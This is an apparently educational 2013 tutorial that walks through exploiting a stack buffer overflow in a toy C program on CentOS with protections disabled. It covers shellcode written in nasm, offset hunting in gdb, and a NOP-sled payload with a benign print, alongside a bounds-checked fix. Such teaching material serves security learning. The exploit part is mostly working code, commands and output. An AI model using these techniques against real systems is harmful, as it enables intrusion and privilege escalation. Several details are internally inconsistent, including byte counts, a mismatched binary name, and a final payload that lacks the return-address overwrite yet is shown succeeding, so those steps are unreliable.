Writing Buffer Overflows

15 October 2013

Required Tools:

  1. gcc
  2. gdb
  3. nasm
  4. ld
  5. objdump
  6. python

This tutorial also assumes that you have a CentOS test environment. This tutorial uses a fresh CentOS 6.3 virtual machine running on Oracle Virtual Box with 512 MB of RAM and an 8 GB hard drive. The tutorial also assumes Python 2. Python version 2.6 was used for documentation. If you have the above tools you'll be able to compile all the code and test it out on your CentOS box. Note that you will need root privileges to make some of the modifications specified. To install the above software on CentOS use:

$ sudo yum install gcc gdb nasm ld binutils python

Introduction

Buffer overflow vulnerabilities are some of the most prolific and dangerous types of attacks in computer security. The problem essentially boils down to two main factors. The first is that C doesn't enforce type checking and therefore if a programmer isn't careful to handle exceptions unexpected behavior may occur. The second problem is that many process programs written in C run with escalated privileges. This means that an exploit of such a program yields effective control at the level of the exploited process. Since many of these processes run as root, or SYSTEM, successfully exploiting them allows a malicious user a privilege escalation that amount to total control over the target machine.

Buffer overflow exploits are accomplished by mangling the way that C handles memory allocation. When a program in C begins, or starts a function, it allocates a stack of memory for that particular piece of the program. This stack consists of space for variables and data, as well as pointers to return flow control to the proper place in the stack. This allows stacks to grow dynamically as programs fork and carry out subroutines and other processes. This is efficient because the stack doesn't have to be initialized at the start of the program with room for every possible execution path of the program. Instead, as the program runs, memory is allocated on a per needed bases.

Programs don't run in a vacuum, however, and one process can't be allowed to own the stack entirely until it's completion. For this reason the return pointer on these individual pieces of the stack (called stack frames) is critical, so that at the end of the frame execution the processor can return to the original programmatic instructions and continue the program.

Because these frames are allocated dynamically and because they are of a fixed size, if a programmer is not careful it becomes possible to pass in more variable data than is reserved on the stack. For instance, if the following represents a frame:

------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
| return pointer |
------------------

You can see that there are 5 'slots' for data in the frame, the sixth slot is for the return pointer. What happens if the program tries to write 6 'slots' of data into the frame? An exception probably, but if the attacker is careful they could arbitrarily send the pointer to a different location in memory, perhaps a location that contains malicious code.

Turning Off Stack Randomization

Before we get too far into this tutorial lets make sure to create an 'easier' environment for our work. The Linux VA patch is a modification to the kernel that allows for stack randomization which makes it much harder to create reliable buffer overflow exploits. This patch randomizes the stack pointer, making it more difficult to find our jump address to kick off the exploit. It's possible to carry out the exploit with this patch enabled, just much more difficult. Check to make sure the Linux VA patch is disabled as follows. First check to see if randomize_va_space is set off (to zero):

$ cat /proc/sys/kernel/randomize_va_space
0

Red Hat also implements another layer of protection called Exec Shield. Exec Shield is a form of Dynamic Execution Protection (DEP) that makes certain portions of memory space non-executable. You'll want to disable this protection as well. You can check to see if Exec Shield is enabled using the command:

$ cat /proc/sys/kernel/exec-shield
0

If you happen to find either of these enabled (set to a non-zero number) then disable them by adding the following lines to /etc/sysctl.conf (you'll need root to do this):

kernel.randomize_va_space = 0
kernel.exec-shield = 0

Finally you can load these new values into the running kernel using the command:

$ sudo sysctl -p

The most effective way to do this is to pass in malicious bytecode as part of the 'data' and then overwrite the return pointer with the location of the malicious bytecode. Even this process is tricky though, because the return pointer must point to the exact location of the exploit code or the code will fail. For instance, if the pointer lands in the middle of the exploit code it won't execute properly. A neat trick is to pad the start of the exploit shellcode with NOP (no operation) instructions. When the machine encounters a NOP it simply moves to the next instruction. If there are a series of NOP instructions preceding the malicious shell code then the pointer merely has to hit one of them, and then the instructions will cascade down the NOP's to the shellcode. This technique is called a NOP sled.

Other Fine Tuning

You may notice that a lot of tutorials online have a bunch of documentation that points to examining the core dumps of programs that throw segmentation faults. When utilizing your own modern Linux box you might find that your buffer overflow attempts are causing a segmentation fault, but not a core dump. Core dumps can be controlled (if you have sufficient privileges) at the command line as part of your user profile. To check if you have core dump enabled try:

$ ulimit -c
0

If you see the above output (a zero) it means your don't have the ability to view core dumps. Go ahead and change that using:

$ ulimit -c unlimited

This will enable you to view the core dump of your files using GDB. The syntax is:

$ gdb  

Where is the name of the program that just caused the segmentation fault and is the name of the core dump file (note that this won't always be 'core'). Also make sure that SELinux is turned off. You can check the status of SELinux using:

$ cat /selinux/enforce

If you get a no such file error then SELinux is turned off. Otherwise edit the file /etc/selinux/config and change the value to disabled and restart your machine.

A Further Look at Stack

When you read about buffer overflows you'll read a lot about stacks, heaps, frames and the buffer. It's all a little confusing, even if you understand some of the topics, so it's worth examining more closely. As programs are executed they are assigned blocks of memory. Ultimately these are just places in RAM. The processor runs through blocks of memory in order's supplied to them by the 'register'. The register keeps track of what instructions are to be passed to the processor and where they are located. When a program starts it is assigned a block of memory that looks something like this:

 ---------------------------
|  Arguments and variables  |
 ---------------------------
|  Stack                    |
 ---------------------------
|  Stack                    |
 ---------------------------
|  Unused Memory            |
 ---------------------------
|  Unused Memory            |
 ---------------------------
|  Heap                     |
 ---------------------------
|  Program Data             |
 ---------------------------

Ok, so that looks a little weird, but it easily demonstrates how the stack can grow down and the heap can grow up. Those are the two areas where dynamic memory is utilized.

The stack is reserved for dynamic input and function variables. You need this to be dynamic because at run time a program has no idea what sort of input it will get or need to assign to a variable. Some variables might get their value from user input, some from the system, some from reading files, and so on. You can see how it would be impossible for the program to calculate what sort of input it would get (and how that might cause the program to branch) at run time. So the program lines up the instructions in the 'Low Addresses' (the Program Data) part of the diagram. As it runs into blocks of code it allocates space on the stack to hold the variables.

So lets say the program starts with main(). The computer allocates a frame on the stack for the main() function that holds it's variables, etc. So the stack looks something like:

  -----------------
 | data            |
 | data            |
 | return address  |
  -----------------

I've drawn this upside down because it's easier to understand as a stack in this orientation. now the register points at the top of the frame and begins to feed instructions into the processor. Let's say the program calls a function called foo() in main() though. What happens then? Well, a new frame is added to the stack, with the return pointer at the end showing the register where to move next once it's done with the particular frame. Now the stack might look something like:

  -----------------
 | data            |
 | return address  |
  -----------------
 | data            |
 | data            |
 | return address  |
  -----------------

With the variables for foo() on top of the stack. The return pointer is at the end showing the register where to move in the stack to pick back up in main() at the point after the function foo() is called. It is important to note that these pointers show the register where to return to execute program instructions, values that are usually held in the bottom of the stack as program data. Knowing this you can see why a return pointer is necessary, rather than having the program just chew down the stack.

A Look at the Victim

Let's examine the following code for the blame program. The code actually makes a rudimentary attempt to prevent a buffer overflow exploit, but one which doesn't work.

#include <stdio.h>
#include <string.h>
#define INPUT_BUFFER 256  /* maximum name size */

/*
 * read input, copy into s
 * gets() is insecure and prints a warning
 *    so we use this instead
 */
void getlines(char *s) {
        int c;
        while ((c=getchar()) != EOF)
                *s++ = c;
        *s = '\0';
}

/*
 * convert newlines to nulls in place
 */
void purgenewlines(char *s) {
        int l;
        l = strlen(s);
        while (l--)
                if (s[l] == '\n')
                        s[l] = '\0';
}

int main() {
        char scapegoat[INPUT_BUFFER];
        getlines(scapegoat);
        /* this check ensures there's no buffer overflow */
        if (strlen(scapegoat) < INPUT_BUFFER) {
                purgenewlines(scapegoat);
                printf("It's all %s's fault.\n", scapegoat);
        }
        return 0;
}

Looking at the code you can see that the main() function sets up the char variable scapegoat with a size set to the constant INPUT_BUFFER (which is 256). A pointer to this variable is now passed to the getline() function which copies the program's input using getchar() into the variable scapegoat. The problem with this function is even after the getline() function finishes and control returns to main() the buffer has been overflown, so the check for length that occurs as the next instruction:

if (strlen(scapegoat) < INPUT_BUFFER) {

happens too late (the chicken has already flown the coop). Let's begin to explore how this particular buffer overflow works. Copy the code above into a text file on your CentOS machine and save it as blame.c then compile it using the command (which will disable some additional stack protections implemented by the compiler):

$ gcc -fno-stack-protector -z execstack blame.c -o blame

Overflowing the Buffer

First let's ensure that we actually can overflow the buffer. We'll use a little Python at the command line to create some input then check out what is going on using gdb. First I'll demonstrate blame working correctly, however:

$ echo foo | ./blame
It's all foo's fault.
$ python -c 'print "A"*456' | ./blame
Segmentation fault

You should see the program crash and a new core file in your current directory (note that the extension may vary since it's the process ID (PID) of the program when it crashes):

$ ls
blame  blame.c  core.1291

You can look at this core file using gdb like so:

$ gdb blame core.1291 
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/justin/blame...(no debugging symbols found)...done.
[New Thread 1291]
Missing separate debuginfo for 
Try: yum --disablerepo='*' --enablerepo='*-debug*' install /usr/lib/debug/.build-id/05/14ca88cad3d3d3eee1b7561eaf052da205c024
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.4.i686

We can see that there was a termination on 0x41414141. It is not by coincidence since 41 is the numeric equivalent of the ASCII character for capital A.

We can use gdb to show us the values of all the registers in memory at the time of the crash. This will show us the value of the effective base pointer (ebp) as well as the effective stack pointer (esp) that correspond to values the computer is using to track execution in the memory stack. To view pointers use the info registers command in gdb like so:

(gdb) info registers
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff630	0xbffff630
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x41414141	0x41414141
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

Looking at the output you can see that the ebp and the eip have both been overwritten with a series of ASCII A's. The eip in particular is the pointer to the next instruction, and the memory address 0x41414141 falls outside of our stack range and thus the program crashed.

A Simple Fix

A simple change in the function will prevent this behavior, but you can easily see how a vulnerability such as this could be overlooked. If getline is rewritten as:

void getlines(char *s) {
        int c;
        int x = 0;

        while ((c=getchar()) != EOF && x < INPUT_BUFFER - 1) {
                *s++ = c;
                x++;
        }
        *s++ = '\0';
}

The program functions safely regardless of the input size. This modification also prevents the gnarly segfault errors from showing up, effectively handling exceptions in a cleaner manner.

Back to Our Regularly Scheduled Exploit

Ok, so now back to our exploit. We know now that an input size of 356 bytes will cause a buffer overflow and overwrite the eip. If we can exploit this weakness we can cause the program to execute some arbitrary commands. Let's begin with what is arguably the most difficult part of this process, our shellcode. While there are shellcode generators out there online, it's a lot easier to be able to build your own, especially if you want to be able to craft very specific behavior out of your buffer overflow.

Generating Shellcode

Let's create some shellcode that makes blame print out the output "Now I p0wn your computer" instead of it's normal function. Usually you'll want a buffer overflow to spawn a shell or perhaps open a backdoor listening port on the target computer, but we'll keep it simple for now. Shellcode, often referred to as bytecode, is basically just assembly language. Now, don't worry if you don't know a whole lot of assembly at this point, we're going to leverage some tools to help make it easier. The first thing we want to do is create a program to test our bytecode. Using the following:

 
/*shellcodetest.c*/

char shellcode[] = "substitute shellcode here";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) shellcode;
  (int)(*func)();
}

We can substitute our shellcode for the "substitute shellcode here" portion. Go ahead and create the file shellcode.c by cutting and pasting the above. Next compile this program so we can use it (I'm assuming you know how to compile raw C code but I'll go ahead and be explicit here just in case):

 
$ gcc -o shellcodetest shellcodetest.c

This creates the executable shellcodetest in the current working directory. Now, it isn't going to work at this point since we don't actually have any shellcode assigned to the shellcode[] variable. Let's go ahead and tackle that challenge now.

For this task we're totally going to gank the hello.asm code from http://www.vividmachines.com/shellcode/shellcode.html (see citations below) and modify it to suit our purposes. You can use C to generate your shellcode as well, but there are some problems that crop up along the way. For instance, you cannot have any null bytes (\x00) in your shellcode or it is interpreted as the end of text input (as the getchar() or other input function in the C program is reading input it stops as soon as it encounters a null, thus your shellcode won't be loaded into memory entirely). For now we'll gloss over how to modify your assembly code using 'xor' to get rid of these null bytes and keep things simple. The code we're going to use is as follows:

 
;hello.asm
[SECTION .text]

global _start


_start:

        jmp short ender

        starter:

        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 24       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

        ender:
        call starter    ;put the address of the string on the stack
        db 'now I p0wn your computer'

If we were really l337 we'd use 'now I p0wn j00r b0x3n' as our string, but that's another tutorial ;) For now we do the following:

 
$ nasm -f elf hello.asm
$ ld -o hello hello.o

You can confirm that everything worked properly by executing the hello program at the command line:

 
$ ./hello
now I p0wn your computer$

Once you're sure your assembly code works it's time to look at the source so that we can pull out the hexidecimal instructions to introduce into our shellcode:

 
$ objdump -d hello

hello:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b <ender>

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 18                   mov    $0x18,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 <starter>
 80480a0:       6e                      outsb  %ds:(%esi),(%dx)
 80480a1:       6f                      outsl  %ds:(%esi),(%dx)
 80480a2:       77 20                   ja     80480c4 <ender+0x29>
 80480a4:       49                      dec    %ecx
 80480a5:       20 70 30                and    %dh,0x30(%eax)
 80480a8:       77 6e                   ja     8048118 <ender+0x7d>
 80480aa:       20 79 6f                and    %bh,0x6f(%ecx)
 80480ad:       75 72                   jne    8048121 <ender+0x86>
 80480af:       20 63 6f                and    %ah,0x6f(%ebx)
 80480b2:       6d                      insl   (%dx),%es:(%edi)
 80480b3:       70 75                   jo     804812a <ender+0x8f>
 80480b5:       74 65                   je     804811c <ender+0x81>
 80480b7:       72                      .byte 0x72

What we're doing here is using the programs nasm, ld, and objdump. The important values (the good stuff) are contained in the second column of the output (the part on the second line that reads 'eb 19'). If you copy all of these out and preface them with "\x" then you have valid shellcode.

So copying out the above example gives us the following 56 instructions:

 
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd
80 31 c0 b0 01 31 db cd 80 e8 e2 ff ff ff 6e 6f 77 20
49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74
65 72

We transform this into shellcode and put it into our test program above:

 
/* revised shellcodetest.c */
/* now with working code :) */
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3"\
"\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"\
"\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72"\
"\x20\x63\x6f\x6d\x70\x75\x74\x65\x72";

main(int argc, char **argv)
{
          int (*func)();
            func = (int (*)()) code;
              (int)(*func)();
}

Lets test out the above code to make sure it works. Save the modified file as shellcodetest.c. Next we'll have to compile the program using gcc and a couple of handy flags that will disable stack protection and stack execution protection as they are enabled in the compiler itself. Compile it using the following command (note this is just one line):

 
$ gcc -fno-stack-protector -z execstack -o shellcodetest shellcodetest.c

Then test the shellcode to see if it works:

 
$ ./shellcode
now I p0wn your computer

Injecting the Shellcode

Ok, the next part of the process is to actually inject the shellcode into a running process with a buffer overflow exploit. First let's examine our overflow of the blame program. We know that with 356 bytes of A's that the eip is overwritten with four bytes worth of A's, or 0x41414141. If we examine this behavior more closely we'll find that the A's that overwrite the eip aren't in fact the last four A's of the payload.

 
$ python -c 'print "A"*100 + "B"*56 + "C"*300' | ./blame
Segmentation fault (core dumped)
$ ls
blame  blame.c  core.1291  core.1315

We can now look at this new core file, noting that it crashed at an illegal instruction at 0x43434343 and that the eip is overwritten with 43's, or the ASCII numeric representation of the letter C.

 
$ gdb blame core.1315
[New Thread 1315]
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x9	9
ebx            0x2c3ff4	2899956
esp            0xbffff630	0xbffff630
ebp            0x43434343	0x43434343
esi            0x0	0
edi            0x0	0
eip            0x43434343	0x43434343
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

You'll notice I used a shorthand for the info registers command by simply typing i r to get the same data. This technique of running the program, dumping the core, then examining the core file with gdb is handy, but somewhat time consuming. What we actually want to do is run this process from within gdb to cut down on time. We can do this by firing up gdb and running the blame program and redirecting input from a file. We can jump out of gdb at any time to modify this text file using:

 
(gdb) shell
$

Then returning to gdb using the command:

 
$exit
(gdb)

This will allow us to modify our input text file quickly and easily. What we're trying to do is use A, B, and C to line up four bytes in the eip that we can use to point to our shell code. When we can overwrite the eip, and only the eip, with four letter B's then we know exactly how to align our buffer overflow so that the overwritten eip is within our control (and can be used to point to our shellcode). Let's get started as follows:

 
$ python -c 'print "A"*100 + "B"*4 + "C"*250' > input
$ cat input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [... snip ...]
$ gdb blame
(gdb) run blame < input
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x3	3
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x43434343	0x43434343
esi            0x0	0
edi            0x0	0
eip            0x43434343	0x43434343
eflags         0x10212	[ AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

It looks like on our first try the eip is being overwritten with C characters, so let's increase the number of A's and decrease the number of C's like so:

 
(gdb) shell
$ python -c 'print "A"*300 + "B"*4 + "C"*52' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x41414141	0x41414141
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

As we can see we have overshot the mark and now eip is overwritten with A's. We continue this process until we can narrow in on a way to place the B's over the eip like so:

 
(gdb) shell
$ python -c 'print "A"*250 + "B"*4 + "C"*102' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) shell
$ python -c 'print "A"*270 + "B"*4 + "C"*82' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x42424141 in ?? ()

And now you can see I've managed to get a couple of B's (ASCII 42) into the eip so that I now know that to overwrite the eip with B's I need 268 A's first, then my B's then 84 C's.

 
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "C"*84' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

And viola, now I have the exact boundaries of my exploit! Now, let's add our shellcode (which is 54 bytes long) to the end, replacing the 84 C characters and using a NOP sled at the beginning. We can then use gdb to examine the actual contents of the stack, in this case looking at the 256 bytes that come after the esp and check to ensure that our shell code is actually there:

 
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x1	1
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/256xb $esp
0xbffff5f0:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff5f8:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff600:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff608:	0x90	0x90	0x90	0x90	0x90	0x90	0xeb	0x19
0xbffff610:	0x31	0xc0	0x31	0xdb	0x31	0xd2	0x31	0xc9
0xbffff618:	0xb0	0x04	0xb3	0x01	0x59	0xb2	0x18	0xcd
0xbffff620:	0x80	0x31	0xc0	0xb0	0x01	0x31	0xdb	0xcd
0xbffff628:	0x80	0xe8	0xe2	0xff	0xff	0xff	0x6e	0x6f
0xbffff630:	0x77	0x20	0x49	0x20	0x70	0x30	0x77	0x6e
0xbffff638:	0x20	0x79	0x6f	0x75	0x72	0x20	0x63	0x6f
0xbffff640:	0x6d	0x70	0x75	0x74	0x65	0x72	0x0a	0x00
0xbffff648:	0x02	0x00	0x00	0x00	0x70	0x83	0x04	0x08
0xbffff650:	0x00	0x00	0x00	0x00	0x20	0x4d	0x12	0x00
0xbffff658:	0x0b	0xcc	0x14	0x00	0xc4	0xef	0x12	0x00
0xbffff660:	0x02	0x00	0x00	0x00	0x70	0x83	0x04	0x08
0xbffff668:	0x00	0x00	0x00	0x00	0x91	0x83	0x04	0x08
0xbffff670:	0x8d	0x84	0x04	0x08	0x02	0x00	0x00	0x00
0xbffff678:	0x94	0xf6	0xff	0xbf	0xf0	0x84	0x04	0x08
0xbffff680:	0xe0	0x84	0x04	0x08	0xa0	0xf4	0x11	0x00
0xbffff688:	0x8c	0xf6	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff690:	0x02	0x00	0x00	0x00	0xc0	0xf7	0xff	0xbf
0xbffff698:	0xd3	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff6a0:	0xd9	0xf7	0xff	0xbf	0xf8	0xf7	0xff	0xbf
0xbffff6a8:	0x08	0xf8	0xff	0xbf	0x1c	0xf8	0xff	0xbf
0xbffff6b0:	0x2a	0xf8	0xff	0xbf	0x4b	0xf8	0xff	0xbf
0xbffff6b8:	0x5e	0xf8	0xff	0xbf	0x6a	0xf8	0xff	0xbf
0xbffff6c0:	0x77	0xfe	0xff	0xbf	0x83	0xfe	0xff	0xbf
0xbffff6c8:	0xd6	0xfe	0xff	0xbf	0xf2	0xfe	0xff	0xbf
0xbffff6d0:	0x01	0xff	0xff	0xbf	0x12	0xff	0xff	0xbf
0xbffff6d8:	0x26	0xff	0xff	0xbf	0x37	0xff	0xff	0xbf
0xbffff6e0:	0x40	0xff	0xff	0xbf	0x57	0xff	0xff	0xbf
0xbffff6e8:	0x69	0xff	0xff	0xbf	0x71	0xff	0xff	0xbf

You can see our shell code neatly nestled in between two NOP sleds. Let's choose an arbitrary memory address in the preceeding NOP sled to use as our target, say 0xbffff5f8. Instead of overwriting the eip with B's we'll instead overwrite the eip with our target address, which should land code execution in the middle of the NOP sled, then proceed down to our shell code. Due to the vagaries of low level architecture, we have to rewrite this address in little endian format (if you overlook this then your address won't work), so it becomes:

 
\xf8\xf5\xff\xbf

Now, lets plug this value in for the "BBBB" part in our payload and test it out:

 
(gdb) shell
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
[justin@localhost ~]$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
now I p0wn your computer
Program exited normally.

And there you have it. Now, at this point the payload will only work in the gdb environment. In order to get it working in the wild we'll have to be a little more creative.

Release the 'Sploit

Now that we've got our shellcode injection and buffer overflow working inside gdb it's time to turn our attention to use of the exploit in the wild. Although our exploit works inside a debugging environment, you might be surprised to learn that it won't actually work at the command line. You can test this like so:

 
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame
Illegal instruction

This is odd since the overflow worked perfectly inside of our debugger. There are a couple of reasons for this. The first is due to the debugger itself, which, when run, actually uses up memory addresses on it's own, and pushes off the address of the blame program. This makes sense as we are using the debugger to observe and report on the operation of blame, gdb itself must first be loaded into memory.

The second reason that the exploit won't work involves the way that memory is abstracted for programs to use. Your computer has a whole bunch of memory, probably gigabytes. Although each program gets an allocation of this total memory when it runs, the kernel actually makes the memory appear as though it is solely for the use of a particular program. In other words, the kernel lies to the program. When a program starts up the kernel recognizes the program and reports to the program that it has pretty much all the memory it wants: “Oh sure blame, here's 8 GB of memory, have at it!” In reality the blame program only gets a small fraction of the total memory.

In addition to the lie that the kernel tells programs about how much memory they have, the kernel also does something that is actually designed for convenience. In order to make it easier for programs to run, and access memory, the kernel actually tells programs that not only do they get all the memory that they want, but that they are running at the very bottom of the memory space, and can use all the upward space they want. As we saw before, we're overwriting a memory address around 0xbffff5f8, which is very close to the top of the memory space at 0xffffffff. Our program thinks it has all the memory it wants!

In order to make our exploit work in the wild we're going to have to be a little more careful about how we overflow the buffer. In our work with gdb we were smashing through the allocated 256 byte buffer, over the return pointer, and off into the the rest of program memory. We were loading our exploit code into another stack frame entirely, which didn't much matter in our gdb exploit, but it was pretty sloppy. A better strategy would have been to write our NOP sled at the start of our input buffer, place the exploit code next, and use the final four bytes to overwrite the pointer. This would reduce the overall size of our exploit to the 212 byte NOP sled, the 56 bytes of instructions, and a 4 byte overwrite (for a total of 272 bytes. Although this makes a smaller, and neater, exploit it still leaves us the problem of finding an address location in our NOP sled. In order to inspect a typical stack layout we can use a simple program, that allocates some stack space, and then reports on the memory location of that space. Copy in the following program to do just that:

 
/****  show_sp.c ****/
#include <stdio.h>

int main(void) {
        char buffer[256];
        char buffer2[6];
        printf("First var: 0x%x\n", &buffer);
        printf("Next var: 0x%x\n", &buffer2);
        return 0;
}

You'll note that by listing the variable name with an ampersand preceding it the output will contain the address of the start of the variable rather than the contents of the variable (its value). Using these two values we can gauge where in memory we will need to point our exploit payload towards. Compile and run this program to get a better idea of what the address space we're looking for will resemble:

 
$ gcc -fno-stack-protector -z execstack -o show_sp show_sp.c 
[justin@localhost ~]$ ./show_sp 
First var: 0xbffff520
Next var: 0xbffff51a

These address spaces look fairly familiar. Let's try using the First var value for our instruction pointer:

 
$ python -c 'print "\x90"*212 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame
now I p0wn your computer

And the exploit works! Now, this program (and the injected shellcode) was pretty benign, but if we were to change the shellcode to do something more malicious, or if the program had been a suid program (set to run as another user, typically root) then we could have leveraged the privilege escalation to do all sorts of things.

Sources and Recommended Reading:

  • Smashing The Stack For Fun And Profit by Aleph One (Phrack 49 - 14)
  • Writing buffer overflow exploits - a tutorial for beginners by Mixter
  • Shellcoding for Linux and Windows Tutorial by steve hanna
  • Metasploit Framework Web Console
  • Buffer Overflow Tutorial by Preddy - RootShell Security Group
  • How Shellcodes Work by by Peter Mikhalenko (5/18/2006)
